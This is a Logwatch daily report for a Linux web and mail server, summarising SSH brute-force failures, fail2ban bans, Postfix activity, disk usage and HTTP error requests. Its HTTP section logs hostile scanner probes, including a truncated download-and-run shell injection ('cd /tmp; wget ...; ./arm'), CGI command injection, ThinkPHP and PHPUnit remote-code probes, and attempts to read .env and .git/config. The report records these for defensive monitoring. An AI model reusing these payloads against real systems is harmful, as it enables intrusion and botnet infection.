[TOPF] Logwatch for h2361197.stratoserver.net (Linux)

Sonntag, 28 Februar 2021


 
 ################### Logwatch 7.4.0 (03/01/11) #################### 
        Processing Initiated: Sun Feb 28 04:42:04 2021
        Date Range Processed: yesterday
                              ( 2021-Feb-27 )
                              Period is day.
        Detail Level of Output: 0
        Type of Output/Format: mail / text
        Logfiles for Host: h2361197.stratoserver.net
 ################################################################## 
 
 --------------------- fail2ban-messages Begin ------------------------ 

 Banned services with Fail2Ban:				 Bans:Unbans
    ssh:                                                    [140:141]
 
 ---------------------- fail2ban-messages End ------------------------- 

 
 --------------------- httpd Begin ------------------------ 

 
 Connection attempts using mod_proxy:
    125.72.95.251 -> zapf.wiki:443: 1 Time(s)
    60.191.125.35 -> zapf.wiki:443: 1 Time(s)
 
 A total of 8 sites probed the server 
    159.65.206.162
    172.104.242.173
    185.153.197.179
    20.52.134.161
    222.186.136.150
    37.120.247.100
    5.8.10.202
    89.248.170.112
 
 Requests with error response codes
    400 Bad Request
       null: 8 Time(s)
       /config/getuser?index=0: 4 Time(s)
       http://fuwu.sogou.com/404/index.html: 2 Time(s)
       zapf.wiki:443: 2 Time(s)
       ../../proc/: 1 Time(s)
       /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_ ... _ntp_server=`cd: 1 Time(s)
       /confirm/%s: 1 Time(s)
       /op_type=ping&destination=cd: 1 Time(s)
       /shell?cd+/tmp;rm+arm+arm7;wget+http:/\x5C ... +arm;./arm+jaws: 1 Time(s)
       /w00tw00t.at.ISC.SANS.DFind:): 1 Time(s)
       7: 1 Time(s)
       ;q\xDB\xB66\xB1\x13_DT\x22\xE6\x95\x0F\x8E ... \xB0GYh\xF1\x00: 1 Time(s)
       X\xD4>\x12\x98\xC4<\xE0\x13\xCF\x00\xAC\xA ... 5Cs\x9C\xBD\xCB: 1 Time(s)
       \x83tB\xCC\xAC\xF0`\x96\xD8\x9D\xCE\x88\xF ... A\x1A\x01oX\xA0: 1 Time(s)
       \x84\xB4,\x85\xAFn\xE3Y\xBBbhl\xFF(=':\xA9 ... B9\x90\x00(\xC0: 1 Time(s)
       \x8E\x1D\x97\x1E\x05{\x1A\xCB\xF2\x1E\xB0> ... 00x\x95\x9F\xCE: 1 Time(s)
    404 Not Found
       /robots.txt: 97 Time(s)
       /wp-login.php: 6 Time(s)
       /.git/config: 4 Time(s)
       /reader/1993-wi-reader_st93.pdf: 4 Time(s)
       /.env: 3 Time(s)
       /berichte/WiSe14/Bericht_WiSe14-Bremen.pdf: 3 Time(s)
       /download/zapfev_satzung.pdf: 3 Time(s)
       /resolutionen/sose17/gesellschaftlich_vera ... wantwortung.pdf: 3 Time(s)
       /ads.txt: 2 Time(s)
       /wp-content/: 2 Time(s)
       //2019/wp-includes/wlwmanifest.xml: 1 Time(s)
       //2020/wp-includes/wlwmanifest.xml: 1 Time(s)
       //blog/wp-includes/wlwmanifest.xml: 1 Time(s)
       //cms/wp-includes/wlwmanifest.xml: 1 Time(s)
       //news/wp-includes/wlwmanifest.xml: 1 Time(s)
       //shop/wp-includes/wlwmanifest.xml: 1 Time(s)
       //site/wp-includes/wlwmanifest.xml: 1 Time(s)
       //sito/wp-includes/wlwmanifest.xml: 1 Time(s)
       //test/wp-includes/wlwmanifest.xml: 1 Time(s)
       //web/wp-includes/wlwmanifest.xml: 1 Time(s)
       //website/wp-includes/wlwmanifest.xml: 1 Time(s)
       //wordpress/wp-includes/wlwmanifest.xml: 1 Time(s)
       //wp-includes/wlwmanifest.xml: 1 Time(s)
       //wp/wp-includes/wlwmanifest.xml: 1 Time(s)
       //wp1/wp-includes/wlwmanifest.xml: 1 Time(s)
       //wp2/wp-includes/wlwmanifest.xml: 1 Time(s)
       //xmlrpc.php?rsd: 1 Time(s)
       /downloader: 1 Time(s)
       /home/verein: 1 Time(s)
       /home/zapf: 1 Time(s)
       /humans.txt: 1 Time(s)
    499 (undefined)
       /apple-touch-icon.png: 1 Time(s)
       /favicon.png: 1 Time(s)
    500 Internal Server Error
       /: 66 Time(s)
       /.env: 5 Time(s)
       /sitemap.txt: 5 Time(s)
       /robots.txt: 4 Time(s)
       /atom.xml: 3 Time(s)
       /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
       /.well-known/security.txt: 1 Time(s)
       /?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
       /Autodiscover/Autodiscover.xml: 1 Time(s)
       /_ignition/execute-solution: 1 Time(s)
       /admin//config.php: 1 Time(s)
       /api/jsonws/invoke: 1 Time(s)
       /console/: 1 Time(s)
       /dns-query: 1 Time(s)
       /dns-query?dns=AAABAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB: 1 Time(s)
       /index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
       /mifs/.;/services/LogService: 1 Time(s)
       /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
       /sitemap_index.xml: 1 Time(s)
       /wp-content/plugins/wp-file-manager/readme.txt: 1 Time(s)
 
 ---------------------- httpd End ------------------------- 

 
 --------------------- pam_unix Begin ------------------------ 

 sshd:
    Authentication Failures:
       root (42.192.219.234): 69 Time(s)
       root (218.255.245.10): 68 Time(s)
       root (onion2.hosting.ovh.web-et-solutions.com): 68 Time(s)
       root (118.24.123.136): 67 Time(s)
       root (42.192.81.219): 66 Time(s)
       root (212.233.112.134): 65 Time(s)
       root (159.65.124.47): 64 Time(s)
       root (vps-7494662d.vps.ovh.net): 63 Time(s)
       root (83.11.42.97.ipv4.supernova.orange.pl): 61 Time(s)
       root (189.240.62.227): 60 Time(s)
       root (198.54.121.48): 60 Time(s)
       root (218.92.0.184): 60 Time(s)
       root (217.12.66.21): 59 Time(s)
       root (139.59.81.182): 58 Time(s)
       root (106.12.199.117): 57 Time(s)
       root (218.92.0.145): 57 Time(s)
       root (124.95.143.135): 55 Time(s)
       root (139.59.244.237): 55 Time(s)
       root (218.92.0.171): 53 Time(s)
       root (197.255.136.62): 52 Time(s)
       root (221.181.185.237): 52 Time(s)
       root (221.214.74.10): 52 Time(s)
       root (221.216.205.26): 52 Time(s)
       root (119.28.49.192): 51 Time(s)
       root (106.75.55.46): 50 Time(s)
       root (115.60.56.49): 50 Time(s)
       root (139.186.199.174): 50 Time(s)
       root (45.112.242.22): 50 Time(s)
       root (212.95.137.19): 48 Time(s)
       root (106.12.212.211): 46 Time(s)
       root (66.70.142.214): 46 Time(s)
       root (111.198.48.204): 45 Time(s)
       root (111.229.123.86): 43 Time(s)
       root (109.232.109.58): 42 Time(s)
       root (118.25.129.131): 41 Time(s)
       root (128.199.152.57): 41 Time(s)
       root (218.92.0.165): 41 Time(s)
       root (59.15.3.197): 40 Time(s)
       root (45.11.79.57): 38 Time(s)
       root (122.156.219.212): 37 Time(s)
       root (218.92.0.247): 36 Time(s)
       root (106.55.243.175): 35 Time(s)
       root (106.75.132.3): 35 Time(s)
       root (111.230.196.20): 35 Time(s)
       root (152.136.179.135): 35 Time(s)
       root (222.187.238.87): 35 Time(s)
       root (134.175.236.132): 33 Time(s)
       root (srv.metal-mine.com): 33 Time(s)
       root (222.122.31.133): 32 Time(s)
       root (106.75.101.149): 30 Time(s)
       root (140.143.189.29): 30 Time(s)
       root (101.ip-51-91-122.eu): 29 Time(s)
       root (221.181.185.140): 26 Time(s)
       root (vps-653e60f2.vps.ovh.ca): 25 Time(s)
       root (61.177.172.104): 24 Time(s)
       root (113.10.158.220): 23 Time(s)
       root (218.92.0.138): 22 Time(s)
       root (203.112.156.173): 20 Time(s)
       root (221.181.185.143): 20 Time(s)
       root (78.36.152.186): 20 Time(s)
       root (128.199.177.241): 18 Time(s)
       root (218.92.0.133): 18 Time(s)
       root (218.92.0.185): 18 Time(s)
       root (61.133.232.253): 18 Time(s)
       root (91.90.36.174): 18 Time(s)
       root (222.187.239.31): 14 Time(s)
       root (61.133.232.251): 9 Time(s)
       root (222.206.231.192): 7 Time(s)
       root (200-71-154-142.static.telcel.net.ve): 6 Time(s)
       root (218.92.0.157): 6 Time(s)
       root (61.76.169.138): 6 Time(s)
       root (121.4.35.38): 5 Time(s)
       root (77.ip-51-255-172.eu): 5 Time(s)
       root (193.169.255.236): 3 Time(s)
       root (61.133.232.248): 3 Time(s)
       root (61.133.232.249): 3 Time(s)
       root (61.133.232.254): 3 Time(s)
       root (ec2-3-138-34-49.us-east-2.compute.amazonaws.com): 3 Time(s)
       unknown (171.239.255.246): 3 Time(s)
       unknown (195.54.160.250): 3 Time(s)
       unknown (45.93.201.193): 3 Time(s)
       root (81.161.63.101): 2 Time(s)
       unknown (194.61.25.28): 2 Time(s)
       unknown (216.49.54.211.res-cmts.bus.ptd.net): 2 Time(s)
       unknown (77.39.8.64): 2 Time(s)
       unknown (94-36-242-115.adsl-ull.clienti.tiscali.it): 2 Time(s)
       postgres (193.169.255.236): 1 Time(s)
       postgres (ec2-3-138-34-49.us-east-2.compute.amazonaws.com): 1 Time(s)
       root (1.251.239.18): 1 Time(s)
       root (104.248.10.134): 1 Time(s)
       root (106.13.123.73): 1 Time(s)
       root (106.53.93.233): 1 Time(s)
       root (113.31.118.242): 1 Time(s)
       root (114.143.118.242): 1 Time(s)
       root (122.180.87.199): 1 Time(s)
       root (129.211.169.241): 1 Time(s)
       root (129.226.225.117): 1 Time(s)
       root (138.121.170.194.dnsgigas.es): 1 Time(s)
       root (141.105.105.81): 1 Time(s)
       root (157.230.190.90): 1 Time(s)
       root (178.62.214.85): 1 Time(s)
       root (178.62.255.152): 1 Time(s)
       root (180.167.240.222): 1 Time(s)
       root (194.61.25.28): 1 Time(s)
       root (195.158.28.62): 1 Time(s)
       root (200-97-250-150.user3p.veloxzone.com.br): 1 Time(s)
       root (201.122.102.21): 1 Time(s)
       root (201.238.215.131): 1 Time(s)
       root (209.45.54.107): 1 Time(s)
       root (222.239.28.177): 1 Time(s)
       root (27.111.44.196): 1 Time(s)
       root (39.109.122.173): 1 Time(s)
       root (47.95.253.249): 1 Time(s)
       root (49.234.223.241): 1 Time(s)
       root (49.235.119.51): 1 Time(s)
       root (49.7.164.91): 1 Time(s)
       root (51.15.229.144): 1 Time(s)
       root (61.133.232.252): 1 Time(s)
       root (81.161.63.103): 1 Time(s)
       root (81.70.230.199): 1 Time(s)
       root (82-65-27-68.subs.proxad.net): 1 Time(s)
       root (keeperpool.com): 1 Time(s)
       root (ns507177.ip-192-99-2.net): 1 Time(s)
       root (static.236.198.202.116.clients.your-server.de): 1 Time(s)
       unknown (186.232.141.21): 1 Time(s)
       unknown (218.2.28.94): 1 Time(s)
       unknown (ec2-3-138-34-49.us-east-2.compute.amazonaws.com): 1 Time(s)
    Invalid Users:
       Unknown Account: 20 Time(s)
 
 
 ---------------------- pam_unix End ------------------------- 

 
 --------------------- Postfix Begin ------------------------ 

       12   Miscellaneous warnings  
 
   19.283K  Bytes accepted                              19,746
   19.283K  Bytes sent via SMTP                         19,746
 ========   ==================================================
 
        1   Accepted                                   100.00%
 --------   --------------------------------------------------
        1   Total                                      100.00%
 ========   ==================================================
 
        2   4xx Reject relay denied                    100.00%
 --------   --------------------------------------------------
        2   Total 4xx Rejects                          100.00%
 ========   ==================================================
 
       78   Connections             
        1   Connections lost (inbound) 
       78   Disconnections          
        1   Removed from queue      
        1   Sent via SMTP           
 
        3   Hostname verification errors (FCRDNS) 
 
 
 ---------------------- Postfix End ------------------------- 

 
 --------------------- sendmail-largeboxes (large mail spool files) Begin
------------------------ 

 Large Mailbox threshold: 40MB (41943040 bytes)
  Warning: Large mailbox: mailman.gz (1747199807)
  Warning: Large mailbox: mailman (235703599967)
 
 ---------------------- sendmail-largeboxes (large mail spool files) End
------------------------- 

 
 --------------------- SSHD Begin ------------------------ 

 
 Disconnecting after too many authentication failures for user:
    root : 58 Time(s)
 
 Failed logins from:
    1.251.239.18: 1 time
    3.138.34.49 (ec2-3-138-34-49.us-east-2.compute.amazonaws.com): 4 times
    27.111.44.196: 1 time
    39.109.122.173: 1 time
    42.192.81.219: 66 times
    42.192.219.234: 69 times
    45.11.79.57: 38 times
    45.112.242.22: 50 times
    47.95.253.249: 1 time
    49.7.164.91: 1 time
    49.234.223.241: 1 time
    49.235.119.51: 1 time
    51.15.229.144 (144-229-15-51.instances.scw.cloud): 1 time
    51.83.132.19 (vps-7494662d.vps.ovh.net): 63 times
    51.91.122.101 (101.ip-51-91-122.eu): 29 times
    51.255.172.77 (77.ip-51-255-172.eu): 5 times
    59.15.3.197: 40 times
    61.76.169.138: 6 times
    61.133.232.248: 3 times
    61.133.232.249: 3 times
    61.133.232.251: 9 times
    61.133.232.252: 1 time
    61.133.232.253: 18 times
    61.133.232.254: 3 times
    61.177.172.104: 24 times
    66.45.232.18 (srv.metal-mine.com): 33 times
    66.70.142.214: 46 times
    78.36.152.186 (78-36-152-186.novgorod-avto.ru): 20 times
    81.70.230.199: 1 time
    81.161.63.101: 2 times
    81.161.63.103: 1 time
    82.65.27.68 (82-65-27-68.subs.proxad.net): 1 time
    83.11.42.97 (83.11.42.97.ipv4.supernova.orange.pl): 61 times
    91.90.36.174 (174-36-90-91.omsk.mts.mkc-omsk.ru): 18 times
    104.248.10.134: 1 time
    106.12.199.117: 57 times
    106.12.212.211: 46 times
    106.13.123.73: 1 time
    106.53.93.233: 1 time
    106.55.243.175: 35 times
    106.75.55.46: 50 times
    106.75.101.149: 30 times
    106.75.132.3: 35 times
    109.232.109.58: 42 times
    111.198.48.204: 45 times
    111.229.123.86: 43 times
    111.230.196.20: 35 times
    113.10.158.220: 23 times
    113.31.118.242: 1 time
    114.143.118.242: 1 time
    115.60.56.49 (hn.kd.ny.adsl): 50 times
    116.202.198.236 (static.236.198.202.116.clients.your-server.de): 1 time
    118.24.123.136: 67 times
    118.25.129.131: 41 times
    119.28.49.192: 51 times
    121.4.35.38: 5 times
    122.156.219.212: 37 times
    122.180.87.199 (abts-north-static-199.87.180.122.airtelbroadband.in): 1 time
    124.95.143.135: 55 times
    128.199.152.57: 41 times
    128.199.177.241: 18 times
    129.211.169.241: 1 time
    129.226.225.117: 1 time
    134.175.236.132: 33 times
    138.121.170.194 (138.121.170.194.dnsgigas.es): 1 time
    139.59.81.182: 58 times
    139.59.244.237: 55 times
    139.186.199.174: 50 times
    140.143.189.29: 30 times
    141.105.105.81: 1 time
    152.136.179.135: 35 times
    157.230.190.90: 1 time
    159.65.124.47: 64 times
    159.203.37.63 (keeperpool.com): 1 time
    167.114.67.230 (vps-653e60f2.vps.ovh.ca): 25 times
    178.33.216.187 (onion2.hosting.ovh.web-et-solutions.com): 68 times
    178.62.214.85: 1 time
    178.62.255.152: 1 time
    180.167.240.222: 1 time
    189.240.62.227 (customer-189-240-62-227.uninet-ide.com.mx): 60 times
    192.99.2.41 (ns507177.ip-192-99-2.net): 1 time
    193.169.255.236: 4 times
    194.61.25.28: 1 time
    195.158.28.62 (mail.ereport.uz): 1 time
    197.255.136.62 (bl4.197.255.136.62.dynamic.dsl.cvmultimedia.cv): 52 times
    198.54.121.48: 60 times
    200.71.154.142 (200-71-154-142.static.telcel.net.ve): 6 times
    200.97.250.150 (200-97-250-150.user3p.veloxzone.com.br): 1 time
    201.122.102.21 (dsl-201-122-102-21-sta.prod-empresarial.com.mx): 1 time
    201.238.215.131 (static.201.238.215.131.gtdinternet.com): 1 time
    203.112.156.173: 20 times
    209.45.54.107: 1 time
    212.95.137.19: 48 times
    212.233.112.134: 65 times
    217.12.66.21 (217x12x66x21.dynamic.rostov.ertelecom.ru): 59 times
    218.92.0.133: 18 times
    218.92.0.138: 22 times
    218.92.0.145: 57 times
    218.92.0.157: 6 times
    218.92.0.165: 41 times
    218.92.0.171: 53 times
    218.92.0.184: 61 times
    218.92.0.185: 18 times
    218.92.0.247: 37 times
    218.255.245.10 (static.reserve.wtt.net.hk): 68 times
    221.181.185.140: 30 times
    221.181.185.143: 24 times
    221.181.185.237: 60 times
    221.214.74.10: 52 times
    221.216.205.26: 52 times
    222.122.31.133: 32 times
    222.187.238.87: 39 times
    222.187.239.31: 18 times
    222.206.231.192: 7 times
    222.239.28.177: 1 time
 
 Illegal users from:
    undef: 11 times
    3.138.34.49 (ec2-3-138-34-49.us-east-2.compute.amazonaws.com): 1 time
    45.93.201.193: 3 times
    65.49.20.66 (scan-17.shadowserver.org): 1 time
    77.39.8.64 (host-77-39-8-64.stavropol.ru): 2 times
    94.36.242.115 (94-36-242-115.adsl-ull.clienti.tiscali.it): 2 times
    171.239.255.246 (dynamic-adsl.viettel.vn): 3 times
    186.232.141.21 (fastnetwork.141.21.host.fastnetwork.com.br): 1 time
    194.61.25.28: 3 times
    195.54.160.250: 3 times
    216.49.54.211 (216.49.54.211.res-cmts.bus.ptd.net): 2 times
    218.2.28.94: 1 time
 
 **Unmatched Entries**
 fatal: no matching cipher found: client
aes256-cbc,rijndael-cbc(a)lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none
server
aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com
[preauth] : 1 time(s)
 
 ---------------------- SSHD End ------------------------- 

 
 --------------------- Disk Space Begin ------------------------ 

 Filesystem         Size  Used Avail Use% Mounted on
 /dev/ploop47755p1  394G  242G  132G  65% /
 none               4.0G     0  4.0G   0% /dev
 
 
 ---------------------- Disk Space End ------------------------- 

 
 ###################### Logwatch End #########################

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

[TOPF] Logwatch for h2361197.stratoserver.net (Linux)